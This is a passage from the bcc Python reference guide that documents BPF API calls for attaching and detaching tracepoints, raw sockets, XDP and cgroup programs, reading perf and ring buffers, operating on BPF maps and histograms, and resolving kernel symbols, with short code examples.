<p>To check if your binary has USDT probes, and what they are, you can run <code>readelf -n binary</code> and check the stap debug section.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=enable_probe+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=enable_probe+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="7-attach_raw_tracepoint"><a class="header" href="#7-attach_raw_tracepoint">7. attach_raw_tracepoint()</a></h3>
|
||
<p>Syntax: <code>BPF.attach_raw_tracepoint(tp="tracepoint", fn_name="name")</code></p>
|
||
<p>Instruments the kernel raw tracepoint described by <code>tracepoint</code> (<code>event</code> only, no <code>category</code>), and when hit, runs the BPF function <code>name()</code>.</p>
|
||
<p>This is an explicit way to instrument tracepoints. The <code>RAW_TRACEPOINT_PROBE</code> syntax, covered in the earlier raw tracepoints section, is an alternate method.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">b.attach_raw_tracepoint("sched_switch", "do_trace")
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_raw_tracepoint+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="8-attach_raw_socket"><a class="header" href="#8-attach_raw_socket">8. attach_raw_socket()</a></h3>
|
||
<p>Syntax: <code>BPF.attach_raw_socket(fn, dev)</code></p>
|
||
<p>Attaches a BPF function to the specified network interface.</p>
|
||
<p>The <code>fn</code> must be the type of <code>BPF.function</code> and the bpf_prog type needs to be <code>BPF_PROG_TYPE_SOCKET_FILTER</code> (<code>fn=BPF.load_func(func_name, BPF.SOCKET_FILTER)</code>)</p>
|
||
<p><code>fn.sock</code> is a non-blocking raw socket that was created and bound to <code>dev</code>.</p>
|
||
<p>All network packets processed by <code>dev</code> are copied to the <code>recv-q</code> of <code>fn.sock</code> after being processed by bpf_prog. Try to recv packet form <code>fn.sock</code> with rev/recvfrom/recvmsg. Note that if the <code>recv-q</code> is not read in time after the <code>recv-q</code> is full, the copied packets will be discarded.</p>
|
||
<p>We can use this feature to capture network packets just like <code>tcpdump</code>.</p>
|
||
<p>We can use <code>ss --bpf --packet -p</code> to observe <code>fn.sock</code>.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python">BPF.attach_raw_socket(bpf_func, ifname)
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_raw_socket+path%3Aexamples+language%3Apython&type=Code">search /examples</a></p>
|
||
<h3 id="9-attach_xdp"><a class="header" href="#9-attach_xdp">9. attach_xdp()</a></h3>
|
||
<p>Syntax: <code>BPF.attach_xdp(dev="device", fn=b.load_func("fn_name",BPF.XDP), flags)</code></p>
|
||
<p>Instruments the network driver described by <code>dev</code> , and then receives the packet, run the BPF function <code>fn_name()</code> with flags.</p>
|
||
<p>Here is a list of optional flags.</p>
|
||
<pre><code class="language-Python"># from xdp_flags uapi/linux/if_link.h
|
||
XDP_FLAGS_UPDATE_IF_NOEXIST = (1 << 0)
|
||
XDP_FLAGS_SKB_MODE = (1 << 1)
|
||
XDP_FLAGS_DRV_MODE = (1 << 2)
|
||
XDP_FLAGS_HW_MODE = (1 << 3)
|
||
XDP_FLAGS_REPLACE = (1 << 4)
|
||
</code></pre>
|
||
<p>You can use flags like this <code>BPF.attach_xdp(dev="device", fn=b.load_func("fn_name",BPF.XDP), flags=BPF.XDP_FLAGS_UPDATE_IF_NOEXIST)</code></p>
|
||
<p>The default value of flags is 0. This means if there is no xdp program with <code>device</code>, the fn will run with that device. If there is an xdp program running with device, the old program will be replaced with new fn program.</p>
|
||
<p>Currently, bcc does not support XDP_FLAGS_REPLACE flag. The following are the descriptions of other flags.</p>
|
||
<h4 id="1-xdp_flags_update_if_noexist"><a class="header" href="#1-xdp_flags_update_if_noexist">1. XDP_FLAGS_UPDATE_IF_NOEXIST</a></h4>
|
||
<p>If an XDP program is already attached to the specified driver, attaching the XDP program again will fail.</p>
|
||
<h4 id="2-xdp_flags_skb_mode"><a class="header" href="#2-xdp_flags_skb_mode">2. XDP_FLAGS_SKB_MODE</a></h4>
|
||
<p>Driver doesn’t have support for XDP, but the kernel fakes it.
|
||
XDP program works, but there’s no real performance benefit because packets are handed to kernel stack anyways which then emulates XDP – this is usually supported with generic network drivers used in home computers, laptops, and virtualized HW.</p>
|
||
<h4 id="3-xdp_flags_drv_mode"><a class="header" href="#3-xdp_flags_drv_mode">3. XDP_FLAGS_DRV_MODE</a></h4>
|
||
<p>A driver has XDP support and can hand then to XDP without kernel stack interaction – Few drivers can support it and those are usually for enterprise HW.</p>
|
||
<h4 id="4-xdp_flags_hw_mode"><a class="header" href="#4-xdp_flags_hw_mode">4. XDP_FLAGS_HW_MODE</a></h4>
|
||
<p>XDP can be loaded and executed directly on the NIC – just a handful of NICs can do that.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">b.attach_xdp(dev="ens1", fn=b.load_func("do_xdp", BPF.XDP))
|
||
</code></pre>
|
||
<p>This will instrument the network device <code>ens1</code> , which will then run our BPF defined <code>do_xdp()</code> function each time it receives packets.</p>
|
||
<p>Don't forget to call <code>b.remove_xdp("ens1")</code> at the end!</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_xdp+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_xdp+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="10-attach_func"><a class="header" href="#10-attach_func">10. attach_func()</a></h3>
|
||
<p>Syntax: <code>BPF.attach_func(fn, attachable_fd, attach_type [, flags])</code></p>
|
||
<p>Attaches a BPF function of the specified type to a particular <code>attachable_fd</code>. if the <code>attach_type</code> is <code>BPF_FLOW_DISSECTOR</code>, the function is expected to attach to current net namespace and <code>attachable_fd</code> must be 0.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">b.attach_func(fn, cgroup_fd, BPFAttachType.CGROUP_SOCK_OPS)
|
||
b.attach_func(fn, map_fd, BPFAttachType.SK_MSG_VERDICT)
|
||
</code></pre>
|
||
<p>Note. When attached to "global" hooks (xdp, tc, lwt, cgroup). If the "BPF function" is no longer needed after the program terminates, be sure to call <code>detach_func</code> when the program exits.</p>
|
||
<p>Examples in situ:</p>
|
||
<p><a href="https://github.com/iovisor/bcc/search?q=attach_func+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,</p>
|
||
<h3 id="11-detach_func"><a class="header" href="#11-detach_func">11. detach_func()</a></h3>
|
||
<p>Syntax: <code>BPF.detach_func(fn, attachable_fd, attach_type)</code></p>
|
||
<p>Detaches a BPF function of the specified type.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">b.detach_func(fn, cgroup_fd, BPFAttachType.CGROUP_SOCK_OPS)
|
||
b.detach_func(fn, map_fd, BPFAttachType.SK_MSG_VERDICT)
|
||
</code></pre>
|
||
<p>Examples in situ:</p>
|
||
<p><a href="https://github.com/iovisor/bcc/search?q=detach_func+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,</p>
|
||
<h3 id="12-detach_kprobe"><a class="header" href="#12-detach_kprobe">12. detach_kprobe()</a></h3>
|
||
<p>Syntax: <code>BPF.detach_kprobe(event="event", fn_name="name")</code></p>
|
||
<p>Detach a kprobe handler function of the specified event.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">b.detach_kprobe(event="__page_cache_alloc", fn_name="trace_func_entry")
|
||
</code></pre>
|
||
<h3 id="13-detach_kretprobe"><a class="header" href="#13-detach_kretprobe">13. detach_kretprobe()</a></h3>
|
||
<p>Syntax: <code>BPF.detach_kretprobe(event="event", fn_name="name")</code></p>
|
||
<p>Detach a kretprobe handler function of the specified event.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">b.detach_kretprobe(event="__page_cache_alloc", fn_name="trace_func_return")
|
||
</code></pre>
|
||
<h2 id="debug-output"><a class="header" href="#debug-output">Debug Output</a></h2>
|
||
<h3 id="1-trace_print"><a class="header" href="#1-trace_print">1. trace_print()</a></h3>
|
||
<p>Syntax: <code>BPF.trace_print(fmt="fields")</code></p>
|
||
<p>This method continually reads the globally shared /sys/kernel/debug/tracing/trace_pipe file and prints its contents. This file can be written to via BPF and the bpf_trace_printk() function, however, that method has limitations, including a lack of concurrent tracing support. The BPF_PERF_OUTPUT mechanism, covered earlier, is preferred.</p>
|
||
<p>Arguments:</p>
|
||
<ul>
|
||
<li><code>fmt</code>: optional, and can contain a field formatting string. It defaults to <code>None</code>.</li>
|
||
</ul>
|
||
<p>Examples:</p>
|
||
<pre><code class="language-Python"># print trace_pipe output as-is:
|
||
b.trace_print()
|
||
|
||
# print PID and message:
|
||
b.trace_print(fmt="{1} {5}")
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=trace_print+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=trace_print+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="2-trace_fields"><a class="header" href="#2-trace_fields">2. trace_fields()</a></h3>
|
||
<p>Syntax: <code>BPF.trace_fields(nonblocking=False)</code></p>
|
||
<p>This method reads one line from the globally shared /sys/kernel/debug/tracing/trace_pipe file and returns it as fields. This file can be written to via BPF and the bpf_trace_printk() function, however, that method has limitations, including a lack of concurrent tracing support. The BPF_PERF_OUTPUT mechanism, covered earlier, is preferred.</p>
|
||
<p>Arguments:</p>
|
||
<ul>
|
||
<li><code>nonblocking</code>: optional, defaults to <code>False</code>. When set to <code>True</code>, the program will not block waiting for input.</li>
|
||
</ul>
|
||
<p>Examples:</p>
|
||
<pre><code class="language-Python">while 1:
|
||
try:
|
||
(task, pid, cpu, flags, ts, msg) = b.trace_fields()
|
||
except ValueError:
|
||
continue
|
||
[...]
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=trace_fields+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=trace_fields+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h2 id="output-apis"><a class="header" href="#output-apis">Output APIs</a></h2>
|
||
<p>Normal output from a BPF program is either:</p>
|
||
<ul>
|
||
<li>per-event: using PERF_EVENT_OUTPUT, open_perf_buffer(), and perf_buffer_poll().</li>
|
||
<li>map summary: using items(), or print_log2_hist(), covered in the Maps section.</li>
|
||
</ul>
|
||
<h3 id="1-perf_buffer_poll"><a class="header" href="#1-perf_buffer_poll">1. perf_buffer_poll()</a></h3>
|
||
<p>Syntax: <code>BPF.perf_buffer_poll(timeout=T)</code></p>
|
||
<p>This polls from all open perf ring buffers, calling the callback function that was provided when calling open_perf_buffer for each entry.</p>
|
||
<p>The timeout parameter is optional and measured in milliseconds. In its absence, polling continues indefinitely.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python"># loop with callback to print_event
|
||
b["events"].open_perf_buffer(print_event)
|
||
while 1:
|
||
try:
|
||
b.perf_buffer_poll()
|
||
except KeyboardInterrupt:
|
||
exit();
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/blob/v0.9.0/examples/tracing/hello_perf_output.py#L55">code</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=perf_buffer_poll+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=perf_buffer_poll+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="2-ring_buffer_poll"><a class="header" href="#2-ring_buffer_poll">2. ring_buffer_poll()</a></h3>
|
||
<p>Syntax: <code>BPF.ring_buffer_poll(timeout=T)</code></p>
|
||
<p>This polls from all open ringbuf ring buffers, calling the callback function that was provided when calling open_ring_buffer for each entry.</p>
|
||
<p>The timeout parameter is optional and measured in milliseconds. In its absence, polling continues until
|
||
there is no more data or the callback returns a negative value.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python"># loop with callback to print_event
|
||
b["events"].open_ring_buffer(print_event)
|
||
while 1:
|
||
try:
|
||
b.ring_buffer_poll(30)
|
||
except KeyboardInterrupt:
|
||
exit();
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=ring_buffer_poll+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,</p>
|
||
<h3 id="3-ring_buffer_consume"><a class="header" href="#3-ring_buffer_consume">3. ring_buffer_consume()</a></h3>
|
||
<p>Syntax: <code>BPF.ring_buffer_consume()</code></p>
|
||
<p>This consumes from all open ringbuf ring buffers, calling the callback function that was provided when calling open_ring_buffer for each entry.</p>
|
||
<p>Unlike <code>ring_buffer_poll</code>, this method <strong>does not poll for data</strong> before attempting to consume.
|
||
This reduces latency at the expense of higher CPU consumption. If you are unsure which to use,
|
||
use <code>ring_buffer_poll</code>.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python"># loop with callback to print_event
|
||
b["events"].open_ring_buffer(print_event)
|
||
while 1:
|
||
try:
|
||
b.ring_buffer_consume()
|
||
except KeyboardInterrupt:
|
||
exit();
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=ring_buffer_consume+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,</p>
|
||
<h2 id="map-apis"><a class="header" href="#map-apis">Map APIs</a></h2>
|
||
<p>Maps are BPF data stores, and are used in bcc to implement a table, and then higher level objects on top of tables, including hashes and histograms.</p>
|
||
<h3 id="1-get_table"><a class="header" href="#1-get_table">1. get_table()</a></h3>
|
||
<p>Syntax: <code>BPF.get_table(name)</code></p>
|
||
<p>Returns a table object. This is no longer used, as tables can now be read as items from BPF. Eg: <code>BPF[name]</code>.</p>
|
||
<p>Examples:</p>
|
||
<pre><code class="language-Python">counts = b.get_table("counts")
|
||
|
||
counts = b["counts"]
|
||
</code></pre>
|
||
<p>These are equivalent.</p>
|
||
<h3 id="2-open_perf_buffer"><a class="header" href="#2-open_perf_buffer">2. open_perf_buffer()</a></h3>
|
||
<p>Syntax: <code>table.open_perf_buffers(callback, page_cnt=N, lost_cb=None)</code></p>
|
||
<p>This operates on a table as defined in BPF as BPF_PERF_OUTPUT(), and associates the callback Python function <code>callback</code> to be called when data is available in the perf ring buffer. This is part of the recommended mechanism for transferring per-event data from kernel to user space. The size of the perf ring buffer can be specified via the <code>page_cnt</code> parameter, which must be a power of two number of pages and defaults to 8. If the callback is not processing data fast enough, some submitted data may be lost. <code>lost_cb</code> will be called to log / monitor the lost count. If <code>lost_cb</code> is the default <code>None</code> value, it will just print a line of message to <code>stderr</code>.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python"># process event
|
||
def print_event(cpu, data, size):
|
||
event = ct.cast(data, ct.POINTER(Data)).contents
|
||
[...]
|
||
|
||
# loop with callback to print_event
|
||
b["events"].open_perf_buffer(print_event)
|
||
while 1:
|
||
try:
|
||
b.perf_buffer_poll()
|
||
except KeyboardInterrupt:
|
||
exit()
|
||
</code></pre>
|
||
<p>Note that the data structure transferred will need to be declared in C in the BPF program. For example:</p>
|
||
<pre><code class="language-C">// define output data structure in C
|
||
struct data_t {
|
||
u32 pid;
|
||
u64 ts;
|
||
char comm[TASK_COMM_LEN];
|
||
};
|
||
BPF_PERF_OUTPUT(events);
|
||
[...]
|
||
</code></pre>
|
||
<p>In Python, you can either let bcc generate the data structure from C declaration automatically (recommended):</p>
|
||
<pre><code class="language-Python">def print_event(cpu, data, size):
|
||
event = b["events"].event(data)
|
||
[...]
|
||
</code></pre>
|
||
<p>or define it manually:</p>
|
||
<pre><code class="language-Python"># define output data structure in Python
|
||
TASK_COMM_LEN = 16 # linux/sched.h
|
||
class Data(ct.Structure):
|
||
_fields_ = [("pid", ct.c_ulonglong),
|
||
("ts", ct.c_ulonglong),
|
||
("comm", ct.c_char * TASK_COMM_LEN)]
|
||
|
||
def print_event(cpu, data, size):
|
||
event = ct.cast(data, ct.POINTER(Data)).contents
|
||
[...]
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/blob/v0.9.0/examples/tracing/hello_perf_output.py#L52">code</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=open_perf_buffer+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=open_perf_buffer+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="3-items"><a class="header" href="#3-items">3. items()</a></h3>
|
||
<p>Syntax: <code>table.items()</code></p>
|
||
<p>Returns an array of the keys in a table. This can be used with BPF_HASH maps to fetch, and iterate, over the keys.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python"># print output
|
||
print("%10s %s" % ("COUNT", "STRING"))
|
||
counts = b.get_table("counts")
|
||
for k, v in sorted(counts.items(), key=lambda counts: counts[1].value):
|
||
print("%10d \"%s\"" % (v.value, k.c.encode('string-escape')))
|
||
</code></pre>
|
||
<p>This example also uses the <code>sorted()</code> method to sort by value.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=items+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=items+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="4-values"><a class="header" href="#4-values">4. values()</a></h3>
|
||
<p>Syntax: <code>table.values()</code></p>
|
||
<p>Returns an array of the values in a table.</p>
|
||
<h3 id="5-clear"><a class="header" href="#5-clear">5. clear()</a></h3>
|
||
<p>Syntax: <code>table.clear()</code></p>
|
||
<p>Clears the table: deletes all entries.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python"># print map summary every second:
|
||
while True:
|
||
time.sleep(1)
|
||
print("%-8s\n" % time.strftime("%H:%M:%S"), end="")
|
||
dist.print_log2_hist(sym + " return:")
|
||
dist.clear()
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=clear+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=clear+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="6-items_lookup_and_delete_batch"><a class="header" href="#6-items_lookup_and_delete_batch">6. items_lookup_and_delete_batch()</a></h3>
|
||
<p>Syntax: <code>table.items_lookup_and_delete_batch()</code></p>
|
||
<p>Returns an array of the keys in a table with a single call to BPF syscall. This can be used with BPF_HASH maps to fetch, and iterate, over the keys. It also clears the table: deletes all entries.
|
||
You should rather use table.items_lookup_and_delete_batch() than table.items() followed by table.clear(). It requires kernel v5.6.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python"># print call rate per second:
|
||
print("%9s-%9s-%8s-%9s" % ("PID", "COMM", "fname", "counter"))
|
||
while True:
|
||
for k, v in sorted(b['map'].items_lookup_and_delete_batch(), key=lambda kv: (kv[0]).pid):
|
||
print("%9s-%9s-%8s-%9d" % (k.pid, k.comm, k.fname, v.counter))
|
||
sleep(1)
|
||
</code></pre>
|
||
<h3 id="7-items_lookup_batch"><a class="header" href="#7-items_lookup_batch">7. items_lookup_batch()</a></h3>
|
||
<p>Syntax: <code>table.items_lookup_batch()</code></p>
|
||
<p>Returns an array of the keys in a table with a single call to BPF syscall. This can be used with BPF_HASH maps to fetch, and iterate, over the keys.
|
||
You should rather use table.items_lookup_batch() than table.items(). It requires kernel v5.6.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python"># print current value of map:
|
||
print("%9s-%9s-%8s-%9s" % ("PID", "COMM", "fname", "counter"))
|
||
while True:
|
||
for k, v in sorted(b['map'].items_lookup_batch(), key=lambda kv: (kv[0]).pid):
|
||
print("%9s-%9s-%8s-%9d" % (k.pid, k.comm, k.fname, v.counter))
|
||
</code></pre>
|
||
<h3 id="8-items_delete_batch"><a class="header" href="#8-items_delete_batch">8. items_delete_batch()</a></h3>
|
||
<p>Syntax: <code>table.items_delete_batch(keys)</code></p>
|
||
<p>It clears all entries of a BPF_HASH map when keys is None. It is more efficient than table.clear() since it generates only one system call. You can delete a subset of a map by giving an array of keys as parameter. Those keys and their associated values will be deleted. It requires kernel v5.6.</p>
|
||
<p>Arguments:</p>
|
||
<ul>
|
||
<li>keys is optional and by default is None.</li>
|
||
</ul>
|
||
<h3 id="9-items_update_batch"><a class="header" href="#9-items_update_batch">9. items_update_batch()</a></h3>
|
||
<p>Syntax: <code>table.items_update_batch(keys, values)</code></p>
|
||
<p>Update all the provided keys with new values. The two arguments must be the same length and within the map limits (between 1 and the maximum entries). It requires kernel v5.6.</p>
|
||
<p>Arguments:</p>
|
||
<ul>
|
||
<li>keys is the list of keys to be updated</li>
|
||
<li>values is the list containing the new values.</li>
|
||
</ul>
|
||
<h3 id="10-print_log2_hist"><a class="header" href="#10-print_log2_hist">10. print_log2_hist()</a></h3>
|
||
<p>Syntax: <code>table.print_log2_hist(val_type="value", section_header="Bucket ptr", section_print_fn=None)</code></p>
|
||
<p>Prints a table as a log2 histogram in ASCII. The table must be stored as log2, which can be done using the BPF function <code>bpf_log2l()</code>.</p>
|
||
<p>Arguments:</p>
|
||
<ul>
|
||
<li>val_type: optional, column header.</li>
|
||
<li>section_header: if the histogram has a secondary key, multiple tables will print and section_header can be used as a header description for each.</li>
|
||
<li>section_print_fn: if section_print_fn is not None, it will be passed the bucket value.</li>
|
||
</ul>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python">b = BPF(text="""
|
||
BPF_HISTOGRAM(dist);
|
||
|
||
int kprobe__blk_account_io_done(struct pt_regs *ctx, struct request *req)
|
||
{
|
||
dist.increment(bpf_log2l(req->__data_len / 1024));
|
||
return 0;
|
||
}
|
||
""")
|
||
[...]
|
||
|
||
b["dist"].print_log2_hist("kbytes")
|
||
</code></pre>
|
||
<p>Output:</p>
|
||
<pre><code class="language-sh"> kbytes : count distribution
|
||
0 -> 1 : 3 | |
|
||
2 -> 3 : 0 | |
|
||
4 -> 7 : 211 |********** |
|
||
8 -> 15 : 0 | |
|
||
16 -> 31 : 0 | |
|
||
32 -> 63 : 0 | |
|
||
64 -> 127 : 1 | |
|
||
128 -> 255 : 800 |**************************************|
|
||
</code></pre>
|
||
<p>This output shows a multi-modal distribution, with the largest mode of 128->255 kbytes and a count of 800.</p>
|
||
<p>This is an efficient way to summarize data, as the summarization is performed in-kernel, and only the count column is passed to user space.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=print_log2_hist+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=print_log2_hist+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="11-print_linear_hist"><a class="header" href="#11-print_linear_hist">11. print_linear_hist()</a></h3>
|
||
<p>Syntax: <code>table.print_linear_hist(val_type="value", section_header="Bucket ptr", section_print_fn=None)</code></p>
|
||
<p>Prints a table as a linear histogram in ASCII. This is intended to visualize small integer ranges, eg, 0 to 100.</p>
|
||
<p>Arguments:</p>
|
||
<ul>
|
||
<li>val_type: optional, column header.</li>
|
||
<li>section_header: if the histogram has a secondary key, multiple tables will print and section_header can be used as a header description for each.</li>
|
||
<li>section_print_fn: if section_print_fn is not None, it will be passed the bucket value.</li>
|
||
</ul>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python">b = BPF(text="""
|
||
BPF_HISTOGRAM(dist);
|
||
|
||
int kprobe__blk_account_io_done(struct pt_regs *ctx, struct request *req)
|
||
{
|
||
dist.increment(req->__data_len / 1024);
|
||
return 0;
|
||
}
|
||
""")
|
||
[...]
|
||
|
||
b["dist"].print_linear_hist("kbytes")
|
||
</code></pre>
|
||
<p>Output:</p>
|
||
<pre><code class="language-sh"> kbytes : count distribution
|
||
0 : 3 |****** |
|
||
1 : 0 | |
|
||
2 : 0 | |
|
||
3 : 0 | |
|
||
4 : 19 |****************************************|
|
||
5 : 0 | |
|
||
6 : 0 | |
|
||
7 : 0 | |
|
||
8 : 4 |******** |
|
||
9 : 0 | |
|
||
10 : 0 | |
|
||
11 : 0 | |
|
||
12 : 0 | |
|
||
13 : 0 | |
|
||
14 : 0 | |
|
||
15 : 0 | |
|
||
16 : 2 |**** |
|
||
[...]
|
||
</code></pre>
|
||
<p>This is an efficient way to summarize data, as the summarization is performed in-kernel, and only the values in the count column are passed to user space.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=print_linear_hist+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=print_linear_hist+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="12-open_ring_buffer"><a class="header" href="#12-open_ring_buffer">12. open_ring_buffer()</a></h3>
|
||
<p>Syntax: <code>table.open_ring_buffer(callback, ctx=None)</code></p>
|
||
<p>This operates on a table as defined in BPF as BPF_RINGBUF_OUTPUT(), and associates the callback Python function <code>callback</code> to be called when data is available in the ringbuf ring buffer. This is part of the new (Linux 5.8+) recommended mechanism for transferring per-event data from kernel to user space. Unlike perf buffers, ringbuf sizes are specified within the BPF program, as part of the <code>BPF_RINGBUF_OUTPUT</code> macro. If the callback is not processing data fast enough, some submitted data may be lost. In this case, the events should be polled more frequently and/or the size of the ring buffer should be increased.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python"># process event
|
||
def print_event(ctx, data, size):
|
||
event = ct.cast(data, ct.POINTER(Data)).contents
|
||
[...]
|
||
|
||
# loop with callback to print_event
|
||
b["events"].open_ring_buffer(print_event)
|
||
while 1:
|
||
try:
|
||
b.ring_buffer_poll()
|
||
except KeyboardInterrupt:
|
||
exit()
|
||
</code></pre>
|
||
<p>Note that the data structure transferred will need to be declared in C in the BPF program. For example:</p>
|
||
<pre><code class="language-C">// define output data structure in C
|
||
struct data_t {
|
||
u32 pid;
|
||
u64 ts;
|
||
char comm[TASK_COMM_LEN];
|
||
};
|
||
BPF_RINGBUF_OUTPUT(events, 8);
|
||
[...]
|
||
</code></pre>
|
||
<p>In Python, you can either let bcc generate the data structure from C declaration automatically (recommended):</p>
|
||
<pre><code class="language-Python">def print_event(ctx, data, size):
|
||
event = b["events"].event(data)
|
||
[...]
|
||
</code></pre>
|
||
<p>or define it manually:</p>
|
||
<pre><code class="language-Python"># define output data structure in Python
|
||
TASK_COMM_LEN = 16 # linux/sched.h
|
||
class Data(ct.Structure):
|
||
_fields_ = [("pid", ct.c_ulonglong),
|
||
("ts", ct.c_ulonglong),
|
||
("comm", ct.c_char * TASK_COMM_LEN)]
|
||
|
||
def print_event(ctx, data, size):
|
||
event = ct.cast(data, ct.POINTER(Data)).contents
|
||
[...]
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=open_ring_buffer+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,</p>
|
||
<h3 id="13-push"><a class="header" href="#13-push">13. push()</a></h3>
|
||
<p>Syntax: <code>table.push(leaf, flags=0)</code></p>
|
||
<p>Push an element onto a Stack or Queue table. Raises an exception if the operation does not succeed.
|
||
Passing QueueStack.BPF_EXIST as a flag causes the Queue or Stack to discard the oldest element if it is full.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=push+path%3Atests+language%3Apython&type=Code">search /tests</a>,</p>
|
||
<h3 id="14-pop"><a class="header" href="#14-pop">14. pop()</a></h3>
|
||
<p>Syntax: <code>leaf = table.pop()</code></p>
|
||
<p>Pop an element from a Stack or Queue table. Unlike <code>peek()</code>, <code>pop()</code>
|
||
removes the element from the table before returning it.
|
||
Raises a KeyError exception if the operation does not succeed.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=pop+path%3Atests+language%3Apython&type=Code">search /tests</a>,</p>
|
||
<h3 id="15-peek"><a class="header" href="#15-peek">15. peek()</a></h3>
|
||
<p>Syntax: <code>leaf = table.peek()</code></p>
|
||
<p>Peek the element at the head of a Stack or Queue table. Unlike <code>pop()</code>, <code>peek()</code>
|
||
does not remove the element from the table. Raises an exception if the operation does not succeed.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=peek+path%3Atests+language%3Apython&type=Code">search /tests</a>,</p>
|
||
<h2 id="helpers-1"><a class="header" href="#helpers-1">Helpers</a></h2>
|
||
<p>Some helper methods provided by bcc. Note that since we're in Python, we can import any Python library and their methods, including, for example, the libraries: argparse, collections, ctypes, datetime, re, socket, struct, subprocess, sys, and time.</p>
|
||
<h3 id="1-ksym"><a class="header" href="#1-ksym">1. ksym()</a></h3>
|
||
<p>Syntax: <code>BPF.ksym(addr)</code></p>
|
||
<p>Translate a kernel memory address into a kernel function name, which is returned.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python">print("kernel function: " + b.ksym(addr))
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=ksym+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=ksym+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="2-ksymname"><a class="header" href="#2-ksymname">2. ksymname()</a></h3>
|
||
<p>Syntax: <code>BPF.ksymname(name)</code></p>
|
||
<p>Translate a kernel name into an address. This is the reverse of ksym. Returns -1 when the function name is unknown.</p>
|
||
<p>Example:</p>
|
||
